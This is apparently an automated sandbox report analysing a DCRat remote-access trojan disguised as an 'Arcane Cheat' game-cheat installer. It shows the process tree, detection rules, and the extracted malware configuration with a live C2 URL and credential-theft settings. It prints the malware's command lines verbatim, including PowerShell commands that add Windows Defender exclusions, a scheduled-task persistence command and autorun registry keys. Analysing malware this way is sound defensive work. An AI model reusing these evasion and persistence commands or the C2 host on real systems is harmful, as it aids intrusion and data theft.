Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
uChcvn3L6R.exe

Overview

General Information

Sample name:uChcvn3L6R.exe
renamed because original name is a hash value
Original sample name:236b78f3cd3a0b771d318f044dda8f45.exe
Analysis ID:1447650
MD5:236b78f3cd3a0b771d318f044dda8f45
SHA1:f890ca2ffb6218fa01df6844fe2a51b184e912b8
SHA256:8342c29aacd500b5d424822648331736379f18bdb6bc27a7e7a579544570fa8a
Tags:exeFormbook
Infos:

Detection

DCRat
Score:92
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected DCRat
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
C2 URLs / IPs found in malware configuration
Check if machine is in data center or colocation facility
Creates an autostart registry key pointing to binary in C:\Windows
Creates an undocumented autostart registry key
Creates autostart registry keys to launch java
Creates multiple autostart registry keys
Creates processes via WMI
Drops PE files with benign system names
Drops executables to the windows directory (C:\Windows) and starts them
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Sigma detected: Execution from Suspicious Folder
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: System File Execution Location Anomaly
Suspicious execution chain found
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to detect virtual machines (SLDT)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
File is packed with WinRar
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries keyboard layouts
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: CurrentVersion NT Autorun Keys Modification
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Process Start Locations
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • uChcvn3L6R.exe (PID: 7060 cmdline: "C:\Users\user\Desktop\uChcvn3L6R.exe" MD5: 236B78F3CD3A0B771D318F044DDA8F45)
    • Arcane CheatSetup.exe (PID: 6432 cmdline: "C:\Users\user\AppData\Local\Temp\Arcane CheatSetup.exe" MD5: 81E98D594505E0008D35FF1E1D2E4E41)
      • Arcane CheatSetup.tmp (PID: 1860 cmdline: "C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp" /SL5="$4042E,46527891,119296,C:\Users\user\AppData\Local\Temp\Arcane CheatSetup.exe" MD5: 129B8E200A6E90E813080C9CE0474063)
    • Arcane Cheat.exe (PID: 5780 cmdline: "C:\Users\user\AppData\Local\Temp\Arcane Cheat.exe" MD5: 593631A643AA6AB0AF08189773812E6D)
      • wscript.exe (PID: 5164 cmdline: "C:\Windows\System32\WScript.exe" "C:\Surrogateprovidercomponentsessionmonitor\lEI1Ux7.vbe" MD5: FF00E0480075B095948000BDC66E81F0)
        • cmd.exe (PID: 1436 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Surrogateprovidercomponentsessionmonitor\bjWdhUfYhC7CKzpdCHePv6eJ.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 6748 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • browserwinsvc.exe (PID: 6456 cmdline: "C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exe" MD5: E780BB029D808CB41937F4F7CD022B45)
            • schtasks.exe (PID: 2484 cmdline: schtasks.exe /create /tn "qiOZcVoixJLcuAFKAnRdq" /sc MINUTE /mo 12 /tr "'C:\Program Files\Uninstall Information\qiOZcVoixJLcuAFKAnRd.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
            • powershell.exe (PID: 2484 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
              • conhost.exe (PID: 7060 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • powershell.exe (PID: 6416 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\RuntimeBroker.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
              • conhost.exe (PID: 6272 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • powershell.exe (PID: 2336 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\addins\audiodg.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
              • conhost.exe (PID: 7216 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • powershell.exe (PID: 7196 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Fonts\qiOZcVoixJLcuAFKAnRd.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • powershell.exe (PID: 7260 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Surrogateprovidercomponentsessionmonitor\qiOZcVoixJLcuAFKAnRd.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
  • audiodg.exe (PID: 7080 cmdline: C:\Windows\addins\audiodg.exe MD5: E780BB029D808CB41937F4F7CD022B45)
  • audiodg.exe (PID: 3196 cmdline: C:\Windows\addins\audiodg.exe MD5: E780BB029D808CB41937F4F7CD022B45)
  • explorer.exe (PID: 6092 cmdline: C:\Recovery\explorer.exe MD5: E780BB029D808CB41937F4F7CD022B45)
  • explorer.exe (PID: 1196 cmdline: C:\Recovery\explorer.exe MD5: E780BB029D808CB41937F4F7CD022B45)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
DCRatDCRat is a typical RAT that has been around since at least June 2019.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat

Malware Configuration

Threatname: DCRat

{"SCRT": "{\"=\":\"<\",\"z\":\"&\",\"H\":\",\",\"w\":\"@\",\"b\":\"_\",\"D\":\"`\",\"A\":\";\",\"S\":\"!\",\"i\":\"%\",\"E\":\"-\",\"l\":\"*\",\"9\":\"~\",\"W\":\"|\",\"n\":\"#\",\"M\":\" \",\"G\":\")\",\"V\":\">\",\"I\":\".\",\"0\":\"(\",\"O\":\"^\",\"L\":\"$\"}", "PCRT": "{\"Q\":\"`\",\"T\":\"@\",\"U\":\"$\",\"d\":\"(\",\"K\":\")\",\"V\":\"&\",\"B\":\">\",\"Z\":\";\",\"D\":\"#\",\"z\":\"!\",\"L\":\"*\",\"J\":\"|\",\"b\":\",\",\"O\":\"<\",\"k\":\"^\",\"o\":\"-\",\"R\":\" \",\"l\":\"_\",\"F\":\"~\",\"E\":\"%\",\"W\":\".\"}", "TAG": "", "MUTEX": "DCR_MUTEX-9ukBZukGuUbmwPwxZ8oC", "LDTM": false, "DBG": false, "SST": 5, "SMST": 2, "BCS": 0, "AUR": 2, "ASCFG": {"savebrowsersdatatosinglefile": false, "ignorepartiallyemptydata": false, "cookies": true, "passwords": true, "forms": true, "cc": true, "history": false, "telegram": true, "steam": true, "discord": true, "filezilla": true, "screenshot": true, "clipboard": true, "sysinfo": true, "searchpath": "%UsersFolder% - Fast"}, "AS": true, "ASO": false, "AD": false, "H1": "http://729231cm.n9shteam1.top/@0J3bwBXdzh2chlnb", "H2": "http://729231cm.n9shteam1.top/@0J3bwBXdzh2chlnb", "T": "0"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000007.00000002.1869897360.0000000002C04000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
    00000026.00000002.2564245326.00000000024F1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
      0000002C.00000002.2426637115.00000000028D1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
        00000007.00000002.1869897360.0000000002C1F000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
          00000028.00000002.2514657098.0000000002A1F000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
            Click to see the 10 entries

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Execution from Suspicious Folder
            Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: C:\Windows\addins\audiodg.exe, CommandLine: C:\Windows\addins\audiodg.exe, CommandLine|base64offset|contains: , Image: C:\Windows\addins\audiodg.exe, NewProcessName: C:\Windows\addins\audiodg.exe, OriginalFileName: C:\Windows\addins\audiodg.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: C:\Windows\addins\audiodg.exe, ProcessId: 7080, ProcessName: audiodg.exe
            Sigma detected: Files With System Process Name In Unsuspected Locations
            Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exe, ProcessId: 6456, TargetFilename: C:\Recovery\RuntimeBroker.exe
            Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exe", ParentImage: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exe, ParentProcessId: 6456, ParentProcessName: browserwinsvc.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exe', ProcessId: 2484, ProcessName: powershell.exe
            Sigma detected: System File Execution Location Anomaly
            Source: Process startedAuthor: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: C:\Windows\addins\audiodg.exe, CommandLine: C:\Windows\addins\audiodg.exe, CommandLine|base64offset|contains: , Image: C:\Windows\addins\audiodg.exe, NewProcessName: C:\Windows\addins\audiodg.exe, OriginalFileName: C:\Windows\addins\audiodg.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: C:\Windows\addins\audiodg.exe, ProcessId: 7080, ProcessName: audiodg.exe
            Sigma detected: CurrentVersion Autorun Keys Modification
            Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Recovery\RuntimeBroker.exe", EventID: 13, EventType: SetValue, Image: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exe, ProcessId: 6456, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RuntimeBroker
            Sigma detected: CurrentVersion NT Autorun Keys Modification
            Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: explorer.exe, "C:\Recovery\RuntimeBroker.exe", EventID: 13, EventType: SetValue, Image: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exe, ProcessId: 6456, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell
            Sigma detected: Powershell Defender Exclusion
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exe", ParentImage: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exe, ParentProcessId: 6456, ParentProcessName: browserwinsvc.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exe', ProcessId: 2484, ProcessName: powershell.exe
            Sigma detected: Suspicious Process Start Locations
            Source: Process startedAuthor: juju4, Jonhnathan Ribeiro, oscd.community: Data: Command: C:\Windows\addins\audiodg.exe, CommandLine: C:\Windows\addins\audiodg.exe, CommandLine|base64offset|contains: , Image: C:\Windows\addins\audiodg.exe, NewProcessName: C:\Windows\addins\audiodg.exe, OriginalFileName: C:\Windows\addins\audiodg.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: C:\Windows\addins\audiodg.exe, ProcessId: 7080, ProcessName: audiodg.exe
            Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
            Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Surrogateprovidercomponentsessionmonitor\lEI1Ux7.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Surrogateprovidercomponentsessionmonitor\lEI1Ux7.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Arcane Cheat.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Arcane Cheat.exe, ParentProcessId: 5780, ParentProcessName: Arcane Cheat.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Surrogateprovidercomponentsessionmonitor\lEI1Ux7.vbe" , ProcessId: 5164, ProcessName: wscript.exe
            Sigma detected: Non Interactive PowerShell Process Spawned
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exe", ParentImage: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exe, ParentProcessId: 6456, ParentProcessName: browserwinsvc.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exe', ProcessId: 2484, ProcessName: powershell.exe

            Snort Signatures

            Timestamp:05/26/24-10:04:29.664888
            SID:2850862
            Source Port:80
            Destination Port:49738
            Protocol:TCP
            Classtype:A Network Trojan was detected

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus / Scanner detection for submitted sample
            Source: uChcvn3L6R.exeAvira: detected
            Antivirus detection for URL or domain
            Source: http://pesterbdd.com/images/Pester.pngURL Reputation: Label: malware
            Source: http://729231cm.n9shteam1.top/@0J3bwBXdzh2chlnbAvira URL Cloud: Label: malware
            Found malware configuration
            Source: 00000007.00000002.1914350978.0000000012ABD000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: DCRat {"SCRT": "{\"=\":\"<\",\"z\":\"&\",\"H\":\",\",\"w\":\"@\",\"b\":\"_\",\"D\":\"`\",\"A\":\";\",\"S\":\"!\",\"i\":\"%\",\"E\":\"-\",\"l\":\"*\",\"9\":\"~\",\"W\":\"|\",\"n\":\"#\",\"M\":\" \",\"G\":\")\",\"V\":\">\",\"I\":\".\",\"0\":\"(\",\"O\":\"^\",\"L\":\"$\"}", "PCRT": "{\"Q\":\"`\",\"T\":\"@\",\"U\":\"$\",\"d\":\"(\",\"K\":\")\",\"V\":\"&\",\"B\":\">\",\"Z\":\";\",\"D\":\"#\",\"z\":\"!\",\"L\":\"*\",\"J\":\"|\",\"b\":\",\",\"O\":\"<\",\"k\":\"^\",\"o\":\"-\",\"R\":\" \",\"l\":\"_\",\"F\":\"~\",\"E\":\"%\",\"W\":\".\"}", "TAG": "", "MUTEX": "DCR_MUTEX-9ukBZukGuUbmwPwxZ8oC", "LDTM": false, "DBG": false, "SST": 5, "SMST": 2, "BCS": 0, "AUR": 2, "ASCFG": {"savebrowsersdatatosinglefile": false, "ignorepartiallyemptydata": false, "cookies": true, "passwords": true, "forms": true, "cc": true, "history": false, "telegram": true, "steam": true, "discord": true, "filezilla": true, "screenshot": true, "clipboard": true, "sysinfo": true, "searchpath": "%UsersFolder% - Fast"}, "AS": true, "ASO": false, "AD": false, "H1": "http://729231cm.n9shteam1.top/@0J3bwBXdzh2chlnb", "H2": "http://729231cm.n9shteam1.top/@0J3bwBXdzh2chlnb", "T": "0"}
            Multi AV Scanner detection for domain / URL
            Source: http://729231cm.n9shteam1.top/@0J3bwBXdzh2chlnbVirustotal: Detection: 14%Perma Link
            Multi AV Scanner detection for submitted file
            Source: uChcvn3L6R.exeReversingLabs: Detection: 91%
            Source: uChcvn3L6R.exeVirustotal: Detection: 79%Perma Link
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 85.4% probability
            Machine Learning detection for sample
            Source: uChcvn3L6R.exeJoe Sandbox ML: detected
            Source: uChcvn3L6R.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeDirectory created: C:\Program Files\Uninstall Information\qiOZcVoixJLcuAFKAnRd.exeJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeDirectory created: C:\Program Files\Uninstall Information\4f78d385fc35a0Jump to behavior
            Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: uChcvn3L6R.exe, 00000000.00000003.1725594185.0000000004FEE000.00000004.00000020.00020000.00000000.sdmp, Arcane Cheat.exe, 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmp, Arcane Cheat.exe, 00000003.00000000.1725425677.0000000000853000.00000002.00000001.01000000.00000008.sdmp, Arcane Cheat.exe, 00000003.00000003.1727874706.00000000072F2000.00000004.00000020.00020000.00000000.sdmp, Arcane Cheat.exe, 00000003.00000003.1726951934.00000000069E7000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: c:\re\workspace\8-2-build-windows-i586-cygwin\jdk8u101\7261\build\windows-i586\jdk\objs\libjava\java.pdb source: is-LS3UA.tmp.2.dr
            Source: Binary string: c:\re\workspace\8-2-build-windows-i586-cygwin\jdk8u101\7261\build\windows-i586\jdk\objs\libnpt\npt.pdbY" source: is-O5MSC.tmp.2.dr
            Source: Binary string: c:\re\workspace\8-2-build-windows-i586-cygwin\jdk8u101\7261\build\windows-i586\jdk\objs\libjava\java.pdb'% source: is-LS3UA.tmp.2.dr
            Source: Binary string: msvcr120.i386.pdb source: is-11A56.tmp.2.dr
            Source: Binary string: c:\re\workspace\8-2-build-windows-i586-cygwin\jdk8u101\7261\build\windows-i586\jdk\objs\libnpt\npt.pdb source: is-O5MSC.tmp.2.dr
            Source: Binary string: c:\re\workspace\8-2-build-windows-i586-cygwin\jdk8u101\7261\build\windows-i586\jdk\objs\unpackexe\unpack200.pdb source: is-RMB9M.tmp.2.dr
            Source: Binary string: c:\re\workspace\8-2-build-windows-i586-cygwin\jdk8u101\7261\build\windows-i586\jdk\objs\libverify\verify.pdb source: is-G1B5Q.tmp.2.dr
            Source: Binary string: c:\re\workspace\8-2-build-windows-i586-cygwin\jdk8u101\7261\build\windows-i586\jdk\objs\libhprof_jvmti\hprof.pdb source: is-069DQ.tmp.2.dr
            Source: Binary string: c:\re\workspace\8-2-build-windows-i586-cygwin\jdk8u101\7261\build\windows-i586\jdk\objs\libhprof_jvmti\hprof.pdbi source: is-069DQ.tmp.2.dr
            Source: Binary string: c:\re\workspace\8-2-build-windows-i586-cygwin\jdk8u101\7261\build\windows-i586\jdk\objs\rmiregistry_objs\rmiregistry.pdb source: is-DLMB6.tmp.2.dr
            Source: C:\Users\user\AppData\Local\Temp\Arcane Cheat.exeCode function: 3_2_0082A5F4 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,3_2_0082A5F4
            Source: C:\Users\user\AppData\Local\Temp\Arcane Cheat.exeCode function: 3_2_0083B8E0 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,3_2_0083B8E0

            Software Vulnerabilities

            barindex
            Suspicious execution chain found
            Source: C:\Windows\SysWOW64\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

            Networking

            barindex
            Snort IDS alert for network traffic
            Source: TrafficSnort IDS: 2850862 ETPRO TROJAN DCRat Initial Checkin Server Response M4 104.21.22.205:80 -> 192.168.2.4:49738
            C2 URLs / IPs found in malware configuration
            Source: Malware configuration extractorURLs: http://729231cm.n9shteam1.top/@0J3bwBXdzh2chlnb
            Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
            Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
            Source: Joe Sandbox ViewASN Name: TUT-ASUS TUT-ASUS
            Source: unknownDNS query: name: ip-api.com
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
            Source: global trafficDNS traffic detected: DNS query: ip-api.com
            Source: is-LS3UA.tmp.2.drString found in binary or memory: http://bugreport.sun.com/bugreport/
            Source: is-LS3UA.tmp.2.drString found in binary or memory: http://bugreport.sun.com/bugreport/java.vendor.url.bughttp://java.oracle.com/java.vendor.urljava.ven
            Source: Arcane CheatSetup.exe, 00000001.00000003.1704112001.00000000023B0000.00000004.00001000.00020000.00000000.sdmp, Arcane CheatSetup.tmp, 00000002.00000003.1721377728.00000000031A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://counter-strike.com.ua/
            Source: is-DLMB6.tmp.2.dr, is-RMB9M.tmp.2.dr, is-LS3UA.tmp.2.dr, is-069DQ.tmp.2.dr, is-G1B5Q.tmp.2.dr, is-O5MSC.tmp.2.drString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
            Source: is-NCUG3.tmp.2.drString found in binary or memory: http://download.oracle.com/javase/7/docs/technotes/guides/plugin/
            Source: explorer.exe, 00000028.00000002.2415528614.0000000000D34000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://go.micN
            Source: browserwinsvc.exe, 00000007.00000002.1869897360.0000000002C1F000.00000004.00000800.00020000.00000000.sdmp, browserwinsvc.exe, 00000007.00000002.1869897360.0000000002C43000.00000004.00000800.00020000.00000000.sdmp, browserwinsvc.exe, 00000007.00000002.1869897360.0000000002AB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com
            Source: browserwinsvc.exe, 00000007.00000002.1869897360.0000000002AB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/line/?fields=hosting
            Source: is-LS3UA.tmp.2.drString found in binary or memory: http://java.oracle.com/
            Source: is-8FS1L.tmp.2.drString found in binary or memory: http://ocsp.example.net:80
            Source: is-DLMB6.tmp.2.dr, is-RMB9M.tmp.2.dr, is-LS3UA.tmp.2.dr, is-069DQ.tmp.2.dr, is-G1B5Q.tmp.2.dr, is-O5MSC.tmp.2.drString found in binary or memory: http://ocsp.thawte.com0
            Source: is-KHA4M.tmp.2.drString found in binary or memory: http://openjdk.java.net/jeps/220).
            Source: powershell.exe, 00000031.00000002.2021882482.0000019F58EB8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
            Source: is-DLMB6.tmp.2.dr, is-RMB9M.tmp.2.dr, is-LS3UA.tmp.2.dr, is-069DQ.tmp.2.dr, is-G1B5Q.tmp.2.dr, is-O5MSC.tmp.2.drString found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
            Source: is-DLMB6.tmp.2.dr, is-RMB9M.tmp.2.dr, is-LS3UA.tmp.2.dr, is-069DQ.tmp.2.dr, is-G1B5Q.tmp.2.dr, is-O5MSC.tmp.2.drString found in binary or memory: http://s2.symcb.com0
            Source: powershell.exe, 00000029.00000002.2077921372.0000022C975E7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.1964510418.000001C080228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002D.00000002.1952888234.0000020400228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002F.00000002.2053761030.000001D25E368000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000031.00000002.2021882482.0000019F58EB8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
            Source: browserwinsvc.exe, 00000007.00000002.1869897360.0000000002AB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000029.00000002.2077921372.0000022C973C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.1964510418.000001C080001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002D.00000002.1952888234.0000020400001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002F.00000002.2053761030.000001D25E141000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000031.00000002.2021882482.0000019F58C91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: powershell.exe, 00000029.00000002.2077921372.0000022C975E7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.1964510418.000001C080228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002D.00000002.1952888234.0000020400228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002F.00000002.2053761030.000001D25E368000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000031.00000002.2021882482.0000019F58EB8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
            Source: is-DLMB6.tmp.2.dr, is-RMB9M.tmp.2.dr, is-LS3UA.tmp.2.dr, is-069DQ.tmp.2.dr, is-G1B5Q.tmp.2.dr, is-O5MSC.tmp.2.drString found in binary or memory: http://sv.symcb.com/sv.crl0f
            Source: is-DLMB6.tmp.2.dr, is-RMB9M.tmp.2.dr, is-LS3UA.tmp.2.dr, is-069DQ.tmp.2.dr, is-G1B5Q.tmp.2.dr, is-O5MSC.tmp.2.drString found in binary or memory: http://sv.symcb.com/sv.crt0
